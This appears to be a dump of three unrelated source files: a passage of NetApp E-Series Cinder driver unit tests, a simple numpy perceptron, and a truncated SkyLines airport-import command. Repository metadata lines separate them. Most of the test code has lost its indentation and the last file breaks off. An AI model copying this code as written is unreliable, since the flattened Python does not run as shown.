"""Ensure that the SSC data is correctly reported in the pool stats"""
ssc = {self.library.THIN_UQ_SPEC: True, 'key': 'val'}
fake_pool = copy.deepcopy(eseries_fake.STORAGE_POOL)
self.library._get_storage_pools = mock.Mock(return_value=[fake_pool])
self.mock_object(self.library, '_ssc_stats', new_attr={fake_pool[
"volumeGroupRef"]: ssc})
self.library._update_volume_stats()
self.assertEqual(1, len(self.library._stats['pools']))
pool_stats = self.library._stats['pools'][0]
for key in ssc:
self.assertIn(key, pool_stats)
self.assertEqual(ssc[key], pool_stats[key])
def test_update_volume_stats_no_ssc(self):
"""Ensure that that pool stats are correctly reported without SSC"""
fake_pool = copy.deepcopy(eseries_fake.STORAGE_POOL)
self.library._get_storage_pools = mock.Mock(return_value=[fake_pool])
self.library._update_volume_stats()
self.assertEqual(1, len(self.library._stats['pools']))
pool_stats = self.library._stats['pools'][0]
self.assertFalse(pool_stats.get('thin_provisioning_support'))
# Should always be True
self.assertTrue(pool_stats.get('thick_provisioning_support'))
def test_terminate_connection_iscsi_no_hosts(self):
connector = {'initiator': eseries_fake.INITIATOR_NAME}
self.mock_object(self.library._client, 'list_hosts',
mock.Mock(return_value=[]))
self.assertRaises(exception.NotFound,
self.library.terminate_connection_iscsi,
get_fake_volume(),
connector)
def test_terminate_connection_iscsi_volume_not_mapped(self):
connector = {'initiator': eseries_fake.INITIATOR_NAME}
volume = copy.deepcopy(eseries_fake.VOLUME)
volume['listOfMappings'] = []
self.library._get_volume = mock.Mock(return_value=volume)
self.assertRaises(eseries_exc.VolumeNotMapped,
self.library.terminate_connection_iscsi,
get_fake_volume(),
connector)
def test_terminate_connection_iscsi_volume_mapped(self):
connector = {'initiator': eseries_fake.INITIATOR_NAME}
fake_eseries_volume = copy.deepcopy(eseries_fake.VOLUME)
fake_eseries_volume['listOfMappings'] = [
eseries_fake.VOLUME_MAPPING
]
self.mock_object(self.library._client, 'list_volume',
mock.Mock(return_value=fake_eseries_volume))
self.mock_object(host_mapper, 'unmap_volume_from_host')
self.library.terminate_connection_iscsi(get_fake_volume(), connector)
self.assertTrue(host_mapper.unmap_volume_from_host.called)
def test_terminate_connection_iscsi_not_mapped_initiator_does_not_exist(
self):
connector = {'initiator': eseries_fake.INITIATOR_NAME}
self.mock_object(self.library._client, 'list_hosts',
mock.Mock(return_value=[eseries_fake.HOST_2]))
self.assertRaises(exception.NotFound,
self.library.terminate_connection_iscsi,
get_fake_volume(),
connector)
def test_initialize_connection_iscsi_volume_not_mapped(self):
connector = {'initiator': eseries_fake.INITIATOR_NAME}
self.mock_object(self.library._client,
'get_volume_mappings_for_volume',
mock.Mock(return_value=[]))
self.mock_object(host_mapper, 'map_volume_to_single_host',
mock.Mock(
return_value=eseries_fake.VOLUME_MAPPING))
fake_eseries_volume = copy.deepcopy(eseries_fake.VOLUME)
fake_eseries_volume['listOfMappings'] = [
eseries_fake.VOLUME_MAPPING
]
self.mock_object(self.library._client, 'list_volume',
mock.Mock(return_value=fake_eseries_volume))
self.library.initialize_connection_iscsi(get_fake_volume(), connector)
self.assertTrue(
self.library._client.get_volume_mappings_for_volume.called)
self.assertTrue(host_mapper.map_volume_to_single_host.called)
def test_initialize_connection_iscsi_volume_not_mapped_host_does_not_exist(
self):
connector = {'initiator': eseries_fake.INITIATOR_NAME}
self.mock_object(self.library._client,
'get_volume_mappings_for_volume',
mock.Mock(return_value=[]))
self.mock_object(self.library._client, 'list_hosts',
mock.Mock(return_value=[]))
self.mock_object(self.library._client, 'create_host_with_ports',
mock.Mock(return_value=eseries_fake.HOST))
self.mock_object(host_mapper, 'map_volume_to_single_host',
mock.Mock(
return_value=eseries_fake.VOLUME_MAPPING))
fake_eseries_volume = copy.deepcopy(eseries_fake.VOLUME)
fake_eseries_volume['listOfMappings'] = [
eseries_fake.VOLUME_MAPPING
]
self.mock_object(self.library._client, 'list_volume',
mock.Mock(return_value=fake_eseries_volume))
self.library.initialize_connection_iscsi(get_fake_volume(), connector)
self.assertTrue(
self.library._client.get_volume_mappings_for_volume.called)
self.assertTrue(self.library._client.list_hosts.called)
self.assertTrue(self.library._client.create_host_with_ports.called)
self.assertTrue(host_mapper.map_volume_to_single_host.called)
def test_initialize_connection_iscsi_volume_already_mapped_to_target_host(
self):
"""Should be a no-op"""
connector = {'initiator': eseries_fake.INITIATOR_NAME}
self.mock_object(host_mapper, 'map_volume_to_single_host',
mock.Mock(
return_value=eseries_fake.VOLUME_MAPPING))
fake_eseries_volume = copy.deepcopy(eseries_fake.VOLUME)
self.mock_object(self.library._client, 'list_volume',
mock.Mock(return_value=fake_eseries_volume))
self.library.initialize_connection_iscsi(get_fake_volume(), connector)
self.assertTrue(host_mapper.map_volume_to_single_host.called)
def test_initialize_connection_iscsi_volume_mapped_to_another_host(self):
"""Should raise error saying multiattach not enabled"""
connector = {'initiator': eseries_fake.INITIATOR_NAME}
fake_mapping_to_other_host = copy.deepcopy(
eseries_fake.VOLUME_MAPPING)
fake_mapping_to_other_host['mapRef'] = eseries_fake.HOST_2[
'hostRef']
self.mock_object(host_mapper, 'map_volume_to_single_host',
mock.Mock(
side_effect=exception.NetAppDriverException))
self.assertRaises(exception.NetAppDriverException,
self.library.initialize_connection_iscsi,
get_fake_volume(), connector)
self.assertTrue(host_mapper.map_volume_to_single_host.called)
@ddt.data(eseries_fake.WWPN,
fczm_utils.get_formatted_wwn(eseries_fake.WWPN))
def test_get_host_with_matching_port_wwpn(self, port_id):
port_ids = [port_id]
host = copy.deepcopy(eseries_fake.HOST)
host.update(
{
'hostSidePorts': [{'label': 'NewStore', 'type': 'fc',
'address': eseries_fake.WWPN}]
}
)
host_2 = copy.deepcopy(eseries_fake.HOST_2)
host_2.update(
{
'hostSidePorts': [{'label': 'NewStore', 'type': 'fc',
'address': eseries_fake.WWPN_2}]
}
)
host_list = [host, host_2]
self.mock_object(self.library._client,
'list_hosts',
mock.Mock(return_value=host_list))
actual_host = self.library._get_host_with_matching_port(
port_ids)
self.assertEqual(host, actual_host)
def test_get_host_with_matching_port_iqn(self):
port_ids = [eseries_fake.INITIATOR_NAME]
host = copy.deepcopy(eseries_fake.HOST)
host.update(
{
'hostSidePorts': [{'label': 'NewStore', 'type': 'iscsi',
'address': eseries_fake.INITIATOR_NAME}]
}
)
host_2 = copy.deepcopy(eseries_fake.HOST_2)
host_2.update(
{
'hostSidePorts': [{'label': 'NewStore', 'type': 'iscsi',
'address': eseries_fake.INITIATOR_NAME_2}]
}
)
host_list = [host, host_2]
self.mock_object(self.library._client,
'list_hosts',
mock.Mock(return_value=host_list))
actual_host = self.library._get_host_with_matching_port(
port_ids)
self.assertEqual(host, actual_host)
def test_terminate_connection_fc_no_hosts(self):
connector = {'wwpns': [eseries_fake.WWPN]}
self.mock_object(self.library._client, 'list_hosts',
mock.Mock(return_value=[]))
self.assertRaises(exception.NotFound,
self.library.terminate_connection_fc,
get_fake_volume(),
connector)
def test_terminate_connection_fc_volume_not_mapped(self):
connector = {'wwpns': [eseries_fake.WWPN]}
fake_host = copy.deepcopy(eseries_fake.HOST)
fake_host['hostSidePorts'] = [{
'label': 'NewStore',
'type': 'fc',
'address': eseries_fake.WWPN
}]
volume = copy.deepcopy(eseries_fake.VOLUME)
volume['listOfMappings'] = []
self.mock_object(self.library, '_get_volume',
mock.Mock(return_value=volume))
self.mock_object(self.library._client, 'list_hosts',
mock.Mock(return_value=[fake_host]))
self.assertRaises(eseries_exc.VolumeNotMapped,
self.library.terminate_connection_fc,
get_fake_volume(),
connector)
def test_terminate_connection_fc_volume_mapped(self):
connector = {'wwpns': [eseries_fake.WWPN]}
fake_host = copy.deepcopy(eseries_fake.HOST)
fake_host['hostSidePorts'] = [{
'label': 'NewStore',
'type': 'fc',
'address': eseries_fake.WWPN
}]
fake_eseries_volume = copy.deepcopy(eseries_fake.VOLUME)
fake_eseries_volume['listOfMappings'] = [
copy.deepcopy(eseries_fake.VOLUME_MAPPING)
]
self.mock_object(self.library._client, 'list_hosts',
mock.Mock(return_value=[fake_host]))
self.mock_object(self.library._client, 'list_volume',
mock.Mock(return_value=fake_eseries_volume))
self.mock_object(host_mapper, 'unmap_volume_from_host')
self.library.terminate_connection_fc(get_fake_volume(), connector)
self.assertTrue(host_mapper.unmap_volume_from_host.called)
def test_terminate_connection_fc_volume_mapped_no_cleanup_zone(self):
connector = {'wwpns': [eseries_fake.WWPN]}
fake_host = copy.deepcopy(eseries_fake.HOST)
fake_host['hostSidePorts'] = [{
'label': 'NewStore',
'type': 'fc',
'address': eseries_fake.WWPN
}]
expected_target_info = {
'driver_volume_type': 'fibre_channel',
'data': {},
}
fake_eseries_volume = copy.deepcopy(eseries_fake.VOLUME)
fake_eseries_volume['listOfMappings'] = [
copy.deepcopy(eseries_fake.VOLUME_MAPPING)
]
self.mock_object(self.library._client, 'list_hosts',
mock.Mock(return_value=[fake_host]))
self.mock_object(self.library._client, 'list_volume',
mock.Mock(return_value=fake_eseries_volume))
self.mock_object(host_mapper, 'unmap_volume_from_host')
        self.mock_object(
            self.library._client, 'get_volume_mappings_for_host',
            mock.Mock(
                return_value=[copy.deepcopy(eseries_fake.VOLUME_MAPPING)]))
target_info = self.library.terminate_connection_fc(get_fake_volume(),
connector)
self.assertDictEqual(expected_target_info, target_info)
self.assertTrue(host_mapper.unmap_volume_from_host.called)
def test_terminate_connection_fc_volume_mapped_cleanup_zone(self):
connector = {'wwpns': [eseries_fake.WWPN]}
fake_host = copy.deepcopy(eseries_fake.HOST)
fake_host['hostSidePorts'] = [{
'label': 'NewStore',
'type': 'fc',
'address': eseries_fake.WWPN
}]
expected_target_info = {
'driver_volume_type': 'fibre_channel',
'data': {
'target_wwn': [eseries_fake.WWPN_2],
'initiator_target_map': {
eseries_fake.WWPN: [eseries_fake.WWPN_2]
},
},
}
fake_eseries_volume = copy.deepcopy(eseries_fake.VOLUME)
fake_eseries_volume['listOfMappings'] = [
copy.deepcopy(eseries_fake.VOLUME_MAPPING)
]
self.mock_object(self.library._client, 'list_hosts',
mock.Mock(return_value=[fake_host]))
self.mock_object(self.library._client, 'list_volume',
mock.Mock(return_value=fake_eseries_volume))
self.mock_object(host_mapper, 'unmap_volume_from_host')
self.mock_object(self.library._client, 'get_volume_mappings_for_host',
mock.Mock(return_value=[]))
target_info = self.library.terminate_connection_fc(get_fake_volume(),
connector)
self.assertDictEqual(expected_target_info, target_info)
self.assertTrue(host_mapper.unmap_volume_from_host.called)
def test_terminate_connection_fc_not_mapped_host_with_wwpn_does_not_exist(
self):
connector = {'wwpns': [eseries_fake.WWPN]}
self.mock_object(self.library._client, 'list_hosts',
mock.Mock(return_value=[eseries_fake.HOST_2]))
self.assertRaises(exception.NotFound,
self.library.terminate_connection_fc,
get_fake_volume(),
connector)
def test_initialize_connection_fc_volume_not_mapped(self):
connector = {'wwpns': [eseries_fake.WWPN]}
self.mock_object(self.library._client,
'get_volume_mappings_for_volume',
mock.Mock(return_value=[]))
self.mock_object(host_mapper, 'map_volume_to_single_host',
mock.Mock(
return_value=eseries_fake.VOLUME_MAPPING))
expected_target_info = {
'driver_volume_type': 'fibre_channel',
'data': {
'target_discovered': True,
'target_lun': 0,
'target_wwn': [eseries_fake.WWPN_2],
'access_mode': 'rw',
'initiator_target_map': {
eseries_fake.WWPN: [eseries_fake.WWPN_2]
},
},
}
target_info = self.library.initialize_connection_fc(get_fake_volume(),
connector)
self.assertTrue(
self.library._client.get_volume_mappings_for_volume.called)
self.assertTrue(host_mapper.map_volume_to_single_host.called)
self.assertDictEqual(expected_target_info, target_info)
def test_initialize_connection_fc_volume_not_mapped_host_does_not_exist(
self):
connector = {'wwpns': [eseries_fake.WWPN]}
self.library.driver_protocol = 'FC'
self.mock_object(self.library._client,
'get_volume_mappings_for_volume',
mock.Mock(return_value=[]))
self.mock_object(self.library._client, 'list_hosts',
mock.Mock(return_value=[]))
self.mock_object(self.library._client, 'create_host_with_ports',
mock.Mock(return_value=eseries_fake.HOST))
self.mock_object(host_mapper, 'map_volume_to_single_host',
mock.Mock(
return_value=eseries_fake.VOLUME_MAPPING))
self.library.initialize_connection_fc(get_fake_volume(), connector)
self.library._client.create_host_with_ports.assert_called_once_with(
mock.ANY, mock.ANY,
[fczm_utils.get_formatted_wwn(eseries_fake.WWPN)],
port_type='fc', group_id=None
)
def test_initialize_connection_fc_volume_already_mapped_to_target_host(
self):
"""Should be a no-op"""
connector = {'wwpns': [eseries_fake.WWPN]}
self.mock_object(host_mapper, 'map_volume_to_single_host',
mock.Mock(
return_value=eseries_fake.VOLUME_MAPPING))
self.library.initialize_connection_fc(get_fake_volume(), connector)
self.assertTrue(host_mapper.map_volume_to_single_host.called)
def test_initialize_connection_fc_volume_mapped_to_another_host(self):
"""Should raise error saying multiattach not enabled"""
connector = {'wwpns': [eseries_fake.WWPN]}
fake_mapping_to_other_host = copy.deepcopy(
eseries_fake.VOLUME_MAPPING)
fake_mapping_to_other_host['mapRef'] = eseries_fake.HOST_2[
'hostRef']
self.mock_object(host_mapper, 'map_volume_to_single_host',
mock.Mock(
side_effect=exception.NetAppDriverException))
self.assertRaises(exception.NetAppDriverException,
self.library.initialize_connection_fc,
get_fake_volume(), connector)
self.assertTrue(host_mapper.map_volume_to_single_host.called)
def test_initialize_connection_fc_no_target_wwpns(self):
"""Should be a no-op"""
connector = {'wwpns': [eseries_fake.WWPN]}
self.mock_object(host_mapper, 'map_volume_to_single_host',
mock.Mock(
return_value=eseries_fake.VOLUME_MAPPING))
self.mock_object(self.library._client, 'list_target_wwpns',
mock.Mock(return_value=[]))
self.assertRaises(exception.VolumeBackendAPIException,
self.library.initialize_connection_fc,
get_fake_volume(), connector)
self.assertTrue(host_mapper.map_volume_to_single_host.called)
def test_build_initiator_target_map_fc_with_lookup_service(
self):
connector = {'wwpns': [eseries_fake.WWPN, eseries_fake.WWPN_2]}
self.library.lookup_service = mock.Mock()
self.library.lookup_service.get_device_mapping_from_network = (
mock.Mock(return_value=eseries_fake.FC_FABRIC_MAP))
(target_wwpns, initiator_target_map, num_paths) = (
self.library._build_initiator_target_map_fc(connector))
self.assertSetEqual(set(eseries_fake.FC_TARGET_WWPNS),
set(target_wwpns))
self.assertDictEqual(eseries_fake.FC_I_T_MAP, initiator_target_map)
self.assertEqual(4, num_paths)
@ddt.data(('raid0', 'raid0'), ('raid1', 'raid1'), ('raid3', 'raid5'),
('raid5', 'raid5'), ('raid6', 'raid6'), ('raidDiskPool', 'DDP'))
@ddt.unpack
def test_update_ssc_raid_type(self, raid_lvl, raid_lvl_mapping):
pools = [{'volumeGroupRef': 'test_vg1', 'raidLevel': raid_lvl}]
self.library._client.list_storage_pools = mock.Mock(return_value=pools)
ssc_stats = self.library._update_ssc_raid_type(pools)
self.assertEqual({'test_vg1': {'netapp_raid_type': raid_lvl_mapping}},
ssc_stats)
@ddt.data('raidAll', '__UNDEFINED', 'unknown',
'raidUnsupported', 'garbage')
def test_update_ssc_raid_type_invalid(self, raid_lvl):
pools = [{'volumeGroupRef': 'test_vg1', 'raidLevel': raid_lvl}]
self.library._client.list_storage_pools = mock.Mock(return_value=pools)
ssc_stats = self.library._update_ssc_raid_type(pools)
self.assertEqual({'test_vg1': {'netapp_raid_type': 'unknown'}},
ssc_stats)
def test_create_asup(self):
self.library._client = mock.Mock()
self.library._client.features.AUTOSUPPORT = na_utils.FeatureState()
self.library._client.api_operating_mode = (
eseries_fake.FAKE_ASUP_DATA['operating-mode'])
self.library._app_version = eseries_fake.FAKE_APP_VERSION
self.mock_object(
self.library._client, 'get_firmware_version',
mock.Mock(return_value=(
eseries_fake.FAKE_ASUP_DATA['system-version'])))
self.mock_object(
self.library._client, 'get_serial_numbers',
mock.Mock(return_value=eseries_fake.FAKE_SERIAL_NUMBERS))
self.mock_object(
self.library._client, 'get_model_name',
mock.Mock(
return_value=eseries_fake.FAKE_CONTROLLERS[0]['modelName']))
self.mock_object(
self.library._client, 'set_counter',
mock.Mock(return_value={'value': 1}))
mock_invoke = self.mock_object(
self.library._client, 'add_autosupport_data')
self.library._create_asup(eseries_fake.FAKE_CINDER_HOST)
mock_invoke.assert_called_with(eseries_fake.FAKE_KEY,
eseries_fake.FAKE_ASUP_DATA)
def test_create_asup_not_supported(self):
self.library._client = mock.Mock()
self.library._client.features.AUTOSUPPORT = na_utils.FeatureState(
supported=False)
mock_invoke = self.mock_object(
self.library._client, 'add_autosupport_data')
self.library._create_asup(eseries_fake.FAKE_CINDER_HOST)
mock_invoke.assert_not_called()
@ddt.ddt
class NetAppEseriesLibraryMultiAttachTestCase(test.TestCase):
"""Test driver when netapp_enable_multiattach is enabled.
Test driver behavior when the netapp_enable_multiattach configuration
option is True.
"""
def setUp(self):
super(NetAppEseriesLibraryMultiAttachTestCase, self).setUp()
config = eseries_fake.create_configuration_eseries()
config.netapp_enable_multiattach = True
kwargs = {'configuration': config}
self.library = library.NetAppESeriesLibrary("FAKE", **kwargs)
self.library._client = eseries_fake.FakeEseriesClient()
self.library.check_for_setup_error()
def test_do_setup_host_group_already_exists(self):
mock_check_flags = self.mock_object(na_utils, 'check_flags')
self.mock_object(self.library,
'_check_mode_get_or_register_storage_system')
fake_rest_client = eseries_fake.FakeEseriesClient()
self.mock_object(self.library, '_create_rest_client',
mock.Mock(return_value=fake_rest_client))
mock_create = self.mock_object(fake_rest_client, 'create_host_group')
self.library.do_setup(mock.Mock())
self.assertTrue(mock_check_flags.called)
self.assertFalse(mock_create.call_count)
def test_do_setup_host_group_does_not_exist(self):
mock_check_flags = self.mock_object(na_utils, 'check_flags')
fake_rest_client = eseries_fake.FakeEseriesClient()
self.mock_object(self.library, '_create_rest_client',
mock.Mock(return_value=fake_rest_client))
mock_get_host_group = self.mock_object(
fake_rest_client, "get_host_group_by_name",
mock.Mock(side_effect=exception.NotFound))
self.mock_object(self.library,
'_check_mode_get_or_register_storage_system')
self.library.do_setup(mock.Mock())
self.assertTrue(mock_check_flags.called)
self.assertTrue(mock_get_host_group.call_count)
def test_create_volume(self):
self.library._client.create_volume = mock.Mock(
return_value=eseries_fake.VOLUME)
self.library.create_volume(get_fake_volume())
self.assertTrue(self.library._client.create_volume.call_count)
@ddt.data(('netapp_eseries_flash_read_cache', 'flash_cache', 'true'),
('netapp_eseries_flash_read_cache', 'flash_cache', 'false'),
('netapp_eseries_flash_read_cache', 'flash_cache', None),
('netapp_thin_provisioned', 'thin_provision', 'true'),
('netapp_thin_provisioned', 'thin_provision', 'false'),
('netapp_thin_provisioned', 'thin_provision', None),
('netapp_eseries_data_assurance', 'data_assurance', 'true'),
('netapp_eseries_data_assurance', 'data_assurance', 'false'),
('netapp_eseries_data_assurance', 'data_assurance', None),
('netapp:write_cache', 'write_cache', 'true'),
('netapp:write_cache', 'write_cache', 'false'),
('netapp:write_cache', 'write_cache', None),
('netapp:read_cache', 'read_cache', 'true'),
('netapp:read_cache', 'read_cache', 'false'),
('netapp:read_cache', 'read_cache', None),
('netapp_eseries_flash_read_cache', 'flash_cache', 'True'),
('netapp_eseries_flash_read_cache', 'flash_cache', '1'),
('netapp_eseries_data_assurance', 'data_assurance', ''))
@ddt.unpack
def test_create_volume_with_extra_spec(self, spec, key, value):
fake_volume = get_fake_volume()
extra_specs = {spec: value}
volume = copy.deepcopy(eseries_fake.VOLUME)
self.library._client.create_volume = mock.Mock(
return_value=volume)
# Make this utility method return our extra spec
mocked_spec_method = self.mock_object(na_utils,
'get_volume_extra_specs')
mocked_spec_method.return_value = extra_specs
self.library.create_volume(fake_volume)
self.assertEqual(1, self.library._client.create_volume.call_count)
# Ensure create_volume is called with the correct argument
args, kwargs = self.library._client.create_volume.call_args
self.assertIn(key, kwargs)
        if value is not None:
expected = na_utils.to_bool(value)
else:
expected = value
self.assertEqual(expected, kwargs[key])
def test_create_volume_too_many_volumes(self):
self.library._client.list_volumes = mock.Mock(
return_value=[eseries_fake.VOLUME for __ in
range(utils.MAX_LUNS_PER_HOST_GROUP + 1)])
self.library._client.create_volume = mock.Mock(
return_value=eseries_fake.VOLUME)
self.assertRaises(exception.NetAppDriverException,
self.library.create_volume,
get_fake_volume())
self.assertFalse(self.library._client.create_volume.call_count)
def test_create_volume_from_snapshot(self):
fake_eseries_volume = copy.deepcopy(eseries_fake.VOLUME)
self.mock_object(self.library, "_schedule_and_create_volume",
mock.Mock(return_value=fake_eseries_volume))
self.mock_object(self.library, "_create_snapshot_volume",
mock.Mock(return_value=fake_eseries_volume))
self.mock_object(self.library._client, "delete_snapshot_volume")
self.library.create_volume_from_snapshot(
get_fake_volume(), fake_snapshot.fake_snapshot_obj(None))
self.assertEqual(
1, self.library._schedule_and_create_volume.call_count)
self.assertEqual(1, self.library._create_snapshot_volume.call_count)
self.assertEqual(
1, self.library._client.delete_snapshot_volume.call_count)
def test_create_volume_from_snapshot_create_fails(self):
fake_dest_eseries_volume = copy.deepcopy(eseries_fake.VOLUME)
self.mock_object(self.library, "_schedule_and_create_volume",
mock.Mock(return_value=fake_dest_eseries_volume))
self.mock_object(self.library, "_create_snapshot_volume",
mock.Mock(side_effect=exception.NetAppDriverException)
)
self.mock_object(self.library._client, "delete_snapshot_volume")
self.mock_object(self.library._client, "delete_volume")
self.assertRaises(exception.NetAppDriverException,
self.library.create_volume_from_snapshot,
get_fake_volume(),
fake_snapshot.fake_snapshot_obj(None))
self.assertEqual(
1, self.library._schedule_and_create_volume.call_count)
self.assertEqual(1, self.library._create_snapshot_volume.call_count)
self.assertEqual(
0, self.library._client.delete_snapshot_volume.call_count)
# Ensure the volume we were going to copy to is cleaned up
self.library._client.delete_volume.assert_called_once_with(
fake_dest_eseries_volume['volumeRef'])
def test_create_volume_from_snapshot_copy_job_fails(self):
fake_dest_eseries_volume = copy.deepcopy(eseries_fake.VOLUME)
self.mock_object(self.library, "_schedule_and_create_volume",
mock.Mock(return_value=fake_dest_eseries_volume))
self.mock_object(self.library, "_create_snapshot_volume",
mock.Mock(return_value=fake_dest_eseries_volume))
self.mock_object(self.library._client, "delete_snapshot_volume")
self.mock_object(self.library._client, "delete_volume")
fake_failed_volume_copy_job = copy.deepcopy(
eseries_fake.VOLUME_COPY_JOB)
fake_failed_volume_copy_job['status'] = 'failed'
self.mock_object(self.library._client,
"create_volume_copy_job",
mock.Mock(return_value=fake_failed_volume_copy_job))
self.mock_object(self.library._client,
"list_vol_copy_job",
mock.Mock(return_value=fake_failed_volume_copy_job))
self.assertRaises(exception.NetAppDriverException,
self.library.create_volume_from_snapshot,
get_fake_volume(),
fake_snapshot.fake_snapshot_obj(None))
self.assertEqual(
1, self.library._schedule_and_create_volume.call_count)
self.assertEqual(1, self.library._create_snapshot_volume.call_count)
self.assertEqual(
1, self.library._client.delete_snapshot_volume.call_count)
# Ensure the volume we were going to copy to is cleaned up
self.library._client.delete_volume.assert_called_once_with(
fake_dest_eseries_volume['volumeRef'])
def test_create_volume_from_snapshot_fail_to_delete_snapshot_volume(self):
fake_dest_eseries_volume = copy.deepcopy(eseries_fake.VOLUME)
fake_dest_eseries_volume['volumeRef'] = 'fake_volume_ref'
self.mock_object(self.library, "_schedule_and_create_volume",
mock.Mock(return_value=fake_dest_eseries_volume))
self.mock_object(self.library, "_create_snapshot_volume",
mock.Mock(return_value=copy.deepcopy(
eseries_fake.VOLUME)))
self.mock_object(self.library._client, "delete_snapshot_volume",
mock.Mock(side_effect=exception.NetAppDriverException)
)
self.mock_object(self.library._client, "delete_volume")
self.library.create_volume_from_snapshot(
get_fake_volume(), fake_snapshot.fake_snapshot_obj(None))
self.assertEqual(
1, self.library._schedule_and_create_volume.call_count)
self.assertEqual(1, self.library._create_snapshot_volume.call_count)
self.assertEqual(
1, self.library._client.delete_snapshot_volume.call_count)
# Ensure the volume we created is not cleaned up
self.assertEqual(0, self.library._client.delete_volume.call_count)
def test_extend_volume(self):
fake_volume = copy.deepcopy(get_fake_volume())
volume = copy.deepcopy(eseries_fake.VOLUME)
new_capacity = 10
volume['objectType'] = 'volume'
self.library.create_cloned_volume = mock.Mock()
self.library._get_volume = mock.Mock(return_value=volume)
self.library._client.update_volume = mock.Mock()
self.library.extend_volume(fake_volume, new_capacity)
self.library.create_cloned_volume.assert_called_with(mock.ANY,
fake_volume)
def test_extend_volume_thin(self):
fake_volume = copy.deepcopy(get_fake_volume())
volume = copy.deepcopy(eseries_fake.VOLUME)
new_capacity = 10
volume['objectType'] = 'thinVolume'
self.library._client.expand_volume = mock.Mock(return_value=volume)
self.library._get_volume = mock.Mock(return_value=volume)
self.library.extend_volume(fake_volume, new_capacity)
self.library._client.expand_volume.assert_called_with(volume['id'],
new_capacity)
def test_extend_volume_stage_2_failure(self):
fake_volume = copy.deepcopy(get_fake_volume())
volume = copy.deepcopy(eseries_fake.VOLUME)
new_capacity = 10
volume['objectType'] = 'volume'
self.library.create_cloned_volume = mock.Mock()
self.library._client.delete_volume = mock.Mock()
# Create results for multiple calls to _get_volume and _update_volume
get_volume_results = [volume, {'id': 'newId', 'label': 'newVolume'}]
self.library._get_volume = mock.Mock(side_effect=get_volume_results)
update_volume_results = [volume, exception.NetAppDriverException,
volume]
self.library._client.update_volume = mock.Mock(
side_effect=update_volume_results)
self.assertRaises(exception.NetAppDriverException,
self.library.extend_volume, fake_volume,
new_capacity)
self.assertTrue(self.library._client.delete_volume.called)
def test_extend_volume_stage_1_failure(self):
fake_volume = copy.deepcopy(get_fake_volume())
volume = copy.deepcopy(eseries_fake.VOLUME)
new_capacity = 10
volume['objectType'] = 'volume'
self.library.create_cloned_volume = mock.Mock()
self.library._get_volume = mock.Mock(return_value=volume)
self.library._client.update_volume = mock.Mock(
side_effect=exception.NetAppDriverException)
self.assertRaises(exception.NetAppDriverException,
self.library.extend_volume, fake_volume,
new_capacity)
def test_delete_non_existing_volume(self):
volume2 = get_fake_volume()
# Change to a nonexistent id.
volume2['name_id'] = '88888888-4444-4444-4444-cccccccccccc'
self.assertIsNone(self.library.delete_volume(volume2))
def test_map_volume_to_host_volume_not_mapped(self):
"""Map the volume directly to destination host."""
self.mock_object(self.library._client,
'get_volume_mappings_for_volume',
mock.Mock(return_value=[]))
self.mock_object(host_mapper, 'map_volume_to_single_host',
mock.Mock(
return_value=eseries_fake.VOLUME_MAPPING))
self.library.map_volume_to_host(get_fake_volume(),
eseries_fake.VOLUME,
eseries_fake.INITIATOR_NAME_2)
self.assertTrue(
self.library._client.get_volume_mappings_for_volume.called)
self.assertTrue(host_mapper.map_volume_to_single_host.called)
def test_map_volume_to_host_volume_not_mapped_host_does_not_exist(self):
"""Should create the host map directly to the host."""
self.mock_object(self.library._client, 'list_hosts',
mock.Mock(return_value=[]))
self.mock_object(self.library._client, 'create_host_with_ports',
mock.Mock(
return_value=eseries_fake.HOST_2))
self.mock_object(self.library._client,
'get_volume_mappings_for_volume',
mock.Mock(return_value=[]))
self.mock_object(host_mapper, 'map_volume_to_single_host',
mock.Mock(
return_value=eseries_fake.VOLUME_MAPPING))
self.library.map_volume_to_host(get_fake_volume(),
eseries_fake.VOLUME,
eseries_fake.INITIATOR_NAME_2)
self.assertTrue(self.library._client.create_host_with_ports.called)
self.assertTrue(
self.library._client.get_volume_mappings_for_volume.called)
self.assertTrue(host_mapper.map_volume_to_single_host.called)
def test_map_volume_to_host_volume_already_mapped(self):
"""Should be a no-op."""
self.mock_object(host_mapper, 'map_volume_to_multiple_hosts',
mock.Mock(
return_value=eseries_fake.VOLUME_MAPPING))
self.library.map_volume_to_host(get_fake_volume(),
eseries_fake.VOLUME,
eseries_fake.INITIATOR_NAME)
self.assertTrue(host_mapper.map_volume_to_multiple_hosts.called)
| Paul-Ezell/cinder-1 | cinder/tests/unit/volume/drivers/netapp/eseries/test_library.py | Python | apache-2.0 | 54,418 |
import numpy as np
class Perceptron(object):
def __init__(self, bias=0, eta=0.1, epoch=10):
self.bias = bias
self.eta = eta
self.epoch = epoch
def net_input(self, x):
return self.weights[0] + np.dot(x, self.weights[1:])
def fit(self, X, y):
self.weights = np.zeros(1 + X.shape[1])
self.weights[0] = -self.bias
self.errors = []
for _ in range(self.epoch):
errors = 0
for xi, yi in zip(X, y):
# compute error and delta_w
error = yi - self.predict(xi)
delta_w = self.eta * error * xi
                # update weights; scale the bias update by the learning rate as well
                self.weights[1:] += delta_w
                self.weights[0] += self.eta * error
# append to error count
errors += int(error != 0)
self.errors.append(errors)
return self
def predict(self, x):
return np.where(self.net_input(x) >= 0, 1, -1)
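# --- Illustrative usage sketch (not part of the original module) ---
# Fits the perceptron above on a tiny, made-up, linearly separable AND-style
# dataset and prints the learned predictions and the per-epoch error counts.
if __name__ == "__main__":
    X = np.array([[0, 0], [0, 1], [1, 0], [1, 1]])
    y = np.array([-1, -1, -1, 1])  # predict() returns labels in {-1, 1}
    model = Perceptron(eta=0.1, epoch=10).fit(X, y)
    print(model.predict(X))  # should converge to [-1, -1, -1, 1]
    print(model.errors)      # misclassification count per epoch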
| jeancochrane/learning | python-machine-learning/code/algos/perceptron.py | Python | mit | 984 |
from flask_script import Command, Option
from skylines.database import db
from skylines.model import Airport
from skylines.lib.waypoints.welt2000 import get_database
from datetime import datetime
from sqlalchemy.sql.expression import or_, and_
class Welt2000(Command):
""" Import all airports from the WELT2000 project """
option_list = (
Option('--commit', action='store_true',
help='commit changes. Otherwise no changes are made to the database'),
Option('welt2000_path', nargs='?', metavar='WELT2000.TXT',
help='path to the WELT2000 file'),
)
def run(self, commit, welt2000_path):
welt2000 = get_database(path=welt2000_path)
self.current_date = datetime.utcnow()
i = 0
for airport_w2k in welt2000:
if (airport_w2k.type != 'airport' and
airport_w2k.type != 'glider_site' and
airport_w2k.type != 'ulm'):
continue
i += 1
if i % 100 == 0:
db.session.flush()
print str(i) + ": " + airport_w2k.country_code + " " + airport_w2k.name
# try to find this airport in the database
